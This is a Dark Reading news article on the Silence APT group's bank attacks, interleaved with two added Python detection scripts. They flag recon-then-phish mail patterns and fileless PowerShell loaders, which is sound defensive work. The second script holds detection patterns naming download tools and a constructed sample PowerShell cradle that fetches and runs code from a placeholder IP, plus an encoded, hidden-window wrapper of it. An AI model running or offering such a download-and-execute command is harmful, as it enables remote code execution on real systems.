Dark Reading is part of the Informa Tech Division of Informa PLC
Attacks/Breaches

8/21/2019
05:55 PM
Silence APT Group Broadens Attacks on Banks, Gets More Dangerous

Over the past year, the financial damage linked to the Russian-speaking threat group has spiked fivefold, Group-IB says.

The Russian-speaking Silence APT group appears to be evolving into a major threat to banks and financial institutions worldwide, and especially to those in Asia, Europe, Russia, and the former Soviet states.

Singapore-based security firm Group-IB, which has been tracking Silence since 2016, says over the past year the threat group has sharply increased the frequency of its attacks, begun targeting organizations in over two dozen countries, and added new weapons to its malware arsenal.

Some of the malware it has begun using suggests a link with TA505, a threat group perhaps best known for distributing the Dridex banking Trojan and other malware via very high-volume spam campaigns, Group-IB said this week. 

Between last September, when Group-IB first released a detailed report on Silence APT, and now, confirmed total financial losses stemming from the group's activities have surged fivefold, from around $800,000 to $4.2 million, the security firm said.

Rustam Mirkasymov, threat intelligence expert at Group-IB, says Silence has evolved from being a mistake-prone, copycat group to one of the most sophisticated threat actors targeting organizations in the financial sector in Russia, Europe and Asia.

"Given that the gang represents a growing threat to the financial sector worldwide, banks and financial organizations need to be aware of the threat," he says. "Know their tactics and rapidly evolving tools to be able to detect and prevent the gang’s attacks at early stages."  

Silence APT's typical modus operandi has been to try to gain initial access to a target bank's network via malware embedded in phishing emails. It has then used that foothold to locate banking systems and plant malware on them that lets money mules later make fraudulent withdrawals from the bank's ATMs.

In one such campaign earlier this year, the group is believed to have stolen some $3 million from Dutch-Bangla Bank's ATMs. In other attacks, the Silence APT group has similarly fraudulently withdrawn hundreds of thousands of dollars from banks in India, Russia, Bulgaria, and other nations.

Since October 2018, Group-IB researchers have observed the Silence APT group employ a new tactic for deploying its initial malware. Before sending out malware-laden phishing emails, the group has been sending malware-free reconnaissance emails to intended targets to confirm that the messages get through and to gather information on any antivirus tools in use. Group-IB researchers observed at least three campaigns over the last year in which Silence sent tens of thousands of these recon emails to banks in a wide swath of countries, including Malaysia, Singapore, China, and Indonesia.
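The recon-then-phish sequence described above leaves a detectable shape in mail gateway logs: a sender domain that first sends a burst of small, attachment-free messages to many distinct recipients and later returns with attachments. The following is an added example, not code from the article or from Group-IB; the log format, the sample lines, the 14-day window and the thresholds are all constructed assumptions for illustration, and real gateways will need their own parser.

```python
"""Flag sender domains that probe a mail domain with content-free messages
before sending attachments (the recon-then-phish pattern).

Assumed, constructed log format (not from the article or any real gateway):
    <ISO timestamp> from=<addr> to=<addr> attach=<0|1> size=<bytes>
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log. 'probe.example' sends several tiny, attachment-free
# messages to distinct recipients, then returns days later with an attachment.
# 'vendor.example' sends one attachment with no prior probing.
SAMPLE_LOG = """\
2019-03-01T09:00:00 from=news@probe.example to=a.lee@bank.example attach=0 size=412
2019-03-01T09:00:03 from=news@probe.example to=b.tan@bank.example attach=0 size=410
2019-03-01T09:00:07 from=news@probe.example to=c.ng@bank.example attach=0 size=415
2019-03-01T09:00:09 from=news@probe.example to=d.lim@bank.example attach=0 size=413
2019-03-02T11:15:00 from=billing@vendor.example to=a.lee@bank.example attach=1 size=88213
2019-03-05T08:30:00 from=hr@probe.example to=b.tan@bank.example attach=1 size=120544
2019-03-05T08:30:04 from=hr@probe.example to=d.lim@bank.example attach=1 size=120544
"""


def parse_line(line):
    """Parse one log line of the assumed format into a dict."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return {
        "ts": datetime.fromisoformat(ts),
        "from": kv["from"],
        "to": kv["to"],
        "attach": kv["attach"] == "1",
        "size": int(kv["size"]),
    }


def sender_domain(addr):
    return addr.rsplit("@", 1)[-1].lower()


def find_recon_then_phish(log_text, min_probes=3, max_probe_bytes=1024,
                          window=timedelta(days=14)):
    """Return {domain: (probe_count, first_probe_ts, first_attachment_ts)}
    for sender domains that sent small, attachment-free messages to at least
    `min_probes` distinct recipients and then, within `window` of the first
    probe, sent a message carrying an attachment.

    Grouping is by sender domain rather than address because the local part
    is assumed to change between the recon and the phishing wave."""
    by_domain = defaultdict(list)
    for raw in log_text.splitlines():
        if raw.strip():
            rec = parse_line(raw)
            by_domain[sender_domain(rec["from"])].append(rec)

    hits = {}
    for domain, recs in by_domain.items():
        recs.sort(key=lambda r: r["ts"])
        probes = [r for r in recs
                  if not r["attach"] and r["size"] <= max_probe_bytes]
        if len({p["to"] for p in probes}) < min_probes:
            continue
        first_probe = probes[0]["ts"]
        later_attach = [r for r in recs if r["attach"]
                        and first_probe < r["ts"] <= first_probe + window]
        if later_attach:
            hits[domain] = (len(probes), first_probe, later_attach[0]["ts"])
    return hits


if __name__ == "__main__":
    for domain, (n, t0, t1) in find_recon_then_phish(SAMPLE_LOG).items():
        print(f"{domain}: {n} probe messages from {t0}, attachment sent {t1}")
```

Run it over a day's worth of gateway logs rather than the sample and tune `min_probes` and `max_probe_bytes` to your own baseline; newsletter senders that legitimately send many small messages will need an allowlist, which is why the output is a candidate list for review rather than a block decision.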

"Silence usually spends a little more time at the preparation stage than other financially motivated cybercriminals do," Mirkasymov says. "[They] are extremely motivated and are willing to try out new tools and tactics," typically after first carefully studying how other groups are using them, he says.

New Tools, New Capabilities
Among the new tools the group has begun using over the past year are Ivoke, a fileless loader written in PowerShell; EDA, another malicious PowerShell tool based on the Empire post-exploitation agent; and xfs-disp.exe, a Trojan for attacking ATMs.
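Fileless PowerShell loaders of the kind described above never touch disk as an executable, so the place to catch them is PowerShell script block logging (event 4104) rather than file scanning. The following is an added example, not code from the article or from Group-IB, and the patterns are generic indicators for the technique class (in-memory download-and-execute cradles, reflective assembly loading, encoded-command wrappers), not signatures derived from any Silence sample; the three script-block entries are constructed.

```python
"""Scan PowerShell script-block text for fileless-loader indicators.

Generic detection logic for the technique class; patterns are not taken from
any Silence sample. -EncodedCommand payloads are decoded (PowerShell encodes
them as UTF-16LE base64) and re-scanned so wrapping does not hide the cradle.
"""
import base64
import re

# Indicator name -> pattern. A single hit is common in admin activity; the
# combination is what characterises a loader (see is_suspicious).
INDICATORS = [
    ("download_cradle", re.compile(
        r"(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest|"
        r"\biwr\b|\bcurl\b|\bwget\b)", re.I)),
    ("in_memory_exec", re.compile(r"(Invoke-Expression|\biex\b)", re.I)),
    ("reflective_load", re.compile(
        r"\[(System\.)?Reflection\.Assembly\]::Load", re.I)),
    ("base64_payload", re.compile(r"FromBase64String", re.I)),
    ("bypass_flags", re.compile(
        r"-(nop\b|noprofile|w\s+hidden|windowstyle\s+hidden|"
        r"ep\s+bypass|executionpolicy\s+bypass)", re.I)),
]
ENCODED = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the decoded payload of every -EncodedCommand argument found."""
    out = []
    for m in ENCODED.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not a real encoded command; ignore
    return out


def scan_script_block(text):
    """Return the sorted list of indicator names found in the block,
    including those found only inside decoded -EncodedCommand layers."""
    found = set()
    layers = [text] + decode_encoded_command(text)
    for layer in layers:
        for name, pat in INDICATORS:
            if pat.search(layer):
                found.add(name)
    if len(layers) > 1:
        found.add("encoded_command")
    return sorted(found)


def is_suspicious(text, min_hits=2):
    """A lone web request or a lone iex is routine; fetch plus in-memory
    execution, or an encoded wrapper around either, is the loader shape."""
    return len(scan_script_block(text)) >= min_hits


def encode_ps(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it
    (used here only to construct the sample below)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample script-block entries (not real telemetry).
BENIGN = ("Get-Service | Where-Object {$_.Status -eq 'Running'} | "
          "Export-Csv C:\\temp\\svc.csv")
CRADLE = ("IEX (New-Object Net.WebClient)"
          ".DownloadString('http://198.51.100.7/stage1')")
WRAPPED = "powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE)

if __name__ == "__main__":
    for label, block in (("benign", BENIGN), ("cradle", CRADLE),
                         ("wrapped", WRAPPED)):
        print(f"{label}: suspicious={is_suspicious(block)} "
              f"hits={scan_script_block(block)}")
```

Script block logging has to be enabled on the endpoints first (the `EnableScriptBlockLogging` policy), and the scanner should be fed the reassembled script text, since long blocks are split across several 4104 events. Obfuscation that builds the cradle from string fragments will evade these literal patterns, which is an argument for layering this with AMSI-based detection rather than relying on it alone.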

The Silence group has also encrypted TruBot, its main malware downloader, and completely changed its execution logic. In addition, the group has changed the protocol used for communication between infected systems and the command-and-control server.

A lot of the changes appear to have been inspired by the growing attention that the APT actor has been receiving from the research community recently. "Silence has made a number of changes to their toolset with one goal: to complicate detection by security tools," Mirkasymov said.

Group-IB has previously described Silence APT as starting out as a relatively unsophisticated two-person outfit: one member with knowledge of banking systems and the other skilled at reverse engineering and building malware. Their tactics and actions suggested that, when they launched their criminal operations, they were either working in legitimate information security roles or had previously done so, the firm assessed at the time.

Since then, Silence appears to have rapidly grown, based on the frequency and the expanded geography of its attacks, Mirkasymov says. In addition, Silence sometimes relies on third-party developers, which indicates the group has an extensive list of contacts in underground markets, he notes.

"We assess with high confidence that Silence will continue enhancing their arsenal and increasing frequency and scale of their attacks worldwide," he says.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication.